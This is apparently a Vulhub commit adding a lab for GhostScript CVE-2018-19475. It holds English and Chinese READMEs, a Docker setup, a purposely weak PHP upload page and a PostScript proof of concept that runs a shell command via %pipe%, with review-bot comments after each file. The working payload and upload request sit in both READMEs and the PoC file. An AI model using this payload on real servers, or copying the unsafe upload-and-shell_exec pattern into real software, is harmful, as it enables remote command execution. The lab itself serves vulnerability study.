first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled

2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions

Binary image file not shown (46 KiB).


@@ -0,0 +1,54 @@
# GhostScript Sandbox Bypass Command Execution (CVE-2018-19475)
[中文版本(Chinese version)](README.zh-cn.md)
GhostScript is a suite of software based on an interpreter for Adobe Systems' PostScript and PDF page description languages. It is widely used by many image processing libraries.
In late 2018, Man Yue Mo from the Semmle Security Research Team published a variant of [CVE-2018-16509](../CVE-2018-16509), designated as CVE-2018-19475. This vulnerability allows attackers to bypass GhostScript's sandbox through a malicious image and execute arbitrary commands in gs versions prior to 9.26.
References:
- <https://blog.semmle.com/ghostscript-CVE-2018-19475/>
- <https://bugs.ghostscript.com/show_bug.cgi?id=700153>
## Environment Setup
Execute the following command to start a vulnerable environment (including GhostScript 9.25 and ImageMagick 7.0.8-20):
```
docker compose up -d
```
After the server is started, visit `http://your-ip:8080` to see an upload component.
## Vulnerability Reproduction
Upload the POC as an image to execute the command `id > /tmp/success && cat /tmp/success`:
```
POST /index.php HTTP/1.1
Host: target
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryukZmnyhO
Content-Length: 279
------WebKitFormBoundaryukZmnyhO
Content-Disposition: form-data; name="file_upload"; filename="1.jpg"
content-Type="image/png"
%!PS
0 1 300367 {} for
{save restore} stopped {} if
(%pipe%id > /tmp/success && cat /tmp/success) (w) file
------WebKitFormBoundaryukZmnyhO--
```
As you can see, the command will be successfully executed.
![](1.png)
In real-world scenarios, you may need to use out-of-band techniques to detect the vulnerability as direct output may not be available.
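Review bot: the multipart part header in the reproduction request is malformed: `content-Type="image/png"` uses `=` and quotes where a part header reads `Content-Type: image/png`. The lab still succeeds because index.php only inspects the filename extension and never reads this header, but readers paste this block verbatim into their tooling, so the header should be corrected and `Content-Length: 279` recomputed against the actual body. It would also help to state next to the "Upload the POC as an image" sentence that the uploaded content is PostScript regardless of the `.jpg` name, since ImageMagick chooses its decoder from the `%!PS` magic bytes rather than the extension; that is exactly why the extension allowlist in index.php provides no protection.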


@@ -0,0 +1,52 @@
# GhostScript 沙箱绕过命令执行漏洞CVE-2018-19475
GhostScript 是一套基于 Adobe Systems 的 PostScript 和 PDF 页面描述语言解释器的软件。它被许多图像处理库广泛使用。
2018年底来自 Semmle Security Research Team 的 Man Yue Mo 发表了 CVE-2018-16509 漏洞的变体 CVE-2018-19475。该漏洞允许攻击者通过恶意图片绕过 GhostScript 的沙箱,进而在 9.26 以前版本的 gs 中执行任意命令。
参考链接:
- <https://blog.semmle.com/ghostscript-CVE-2018-19475/>
- <https://bugs.ghostscript.com/show_bug.cgi?id=700153>
## 环境搭建
执行如下命令启动漏洞环境(其中包括 GhostScript 9.25 和 ImageMagick 7.0.8-20
```
docker compose up -d
```
环境启动后,访问 `http://your-ip:8080` 将看到一个文件上传组件。
## 漏洞复现
将 POC 作为图片上传,执行命令 `id > /tmp/success && cat /tmp/success`
```
POST /index.php HTTP/1.1
Host: target
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryukZmnyhO
Content-Length: 279
------WebKitFormBoundaryukZmnyhO
Content-Disposition: form-data; name="file_upload"; filename="1.jpg"
content-Type="image/png"
%!PS
0 1 300367 {} for
{save restore} stopped {} if
(%pipe%id > /tmp/success && cat /tmp/success) (w) file
------WebKitFormBoundaryukZmnyhO--
```
可见,命令将被成功执行。
![](1.png)
在实际环境中,由于通常无法直接看到命令执行结果,你可能需要使用带外攻击技术来检测漏洞。
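Review bot: the Chinese README has lost punctuation in three places compared with the English one: the title runs the CVE id into the heading text (`漏洞CVE-2018-19475`, where the English title places the id in parentheses), the environment-setup sentence opens a parenthesis before `GhostScript 9.25` and never closes it, and the sentence introducing the POC ends without the colon that precedes the request block. The same malformed part header `content-Type="image/png"` is duplicated here and should be fixed in both files at once. A link back to the English README, mirroring the `README.zh-cn.md` link at the top of the English file, would let readers switch in either direction.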


@@ -0,0 +1,8 @@
services:
web:
image: vulhub/imagemagick:7.0.8-20-php
command: php -t /var/www/html -S 0.0.0.0:8080
volumes:
- ./index.php:/var/www/html/index.php
ports:
- "8080:8080"
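Review bot: the `ports` entry `"8080:8080"` publishes a deliberately vulnerable service on every host interface, so anyone who can reach the host can hand the container arbitrary PostScript to execute. Binding the mapping to loopback (`"127.0.0.1:8080:8080"`) is the safer default for a lab image and still satisfies the documented `http://your-ip:8080` workflow when the host is local or reached through a port forward; if the all-interfaces binding is intentional, the README should say so and advise running the environment on an isolated network.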


@@ -0,0 +1,21 @@
<?php
if (!empty($_FILES)):
$ext = pathinfo($_FILES['file_upload']['name'], PATHINFO_EXTENSION);
if (!in_array($ext, ['gif', 'png', 'jpg', 'jpeg'])) {
die('Unsupported filetype uploaded.');
}
$size = shell_exec("identify -format '%w x %h' {$_FILES['file_upload']['tmp_name']}");
echo "Image size is: $size";
else:
?>
<form method="post" enctype="multipart/form-data">
File: <input type="file" name="file_upload">
<input type="submit">
</form>
<?php
endif;
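Review bot: `$_FILES['file_upload']['tmp_name']` is interpolated into the `shell_exec` command string unquoted. The value is generated by PHP rather than supplied by the client, so it is not exploitable here, but it is a second shell-injection pattern in a lab meant to demonstrate exactly one bug, and it breaks when `upload_tmp_dir` contains a space; wrapping it in `escapeshellarg()` keeps the intended GhostScript vulnerability intact. The allowlist on `$ext`, taken from the client-supplied filename, is the documented weak check and should stay, but a comment stating that it is intentionally insufficient (ImageMagick selects the decoder from the file's magic bytes, not the extension) would make the teaching point explicit. `$_FILES['file_upload']['error']` is also never checked, so a failed upload still runs `identify` with an empty filename argument and prints a confusing result.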


@@ -0,0 +1,4 @@
%!PS
0 1 300367 {} for
{save restore} stopped {} if
(%pipe%id > /tmp/success && cat /tmp/success) (w) file
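Review bot: this four-line payload is already embedded verbatim in the request bodies of both READMEs, and neither README mentions that a standalone copy exists, so readers will not find it and the three copies can drift apart silently. Either reference this file from the reproduction sections and keep the READMEs' inline copies as a display of its contents, or drop it and keep the READMEs as the single source.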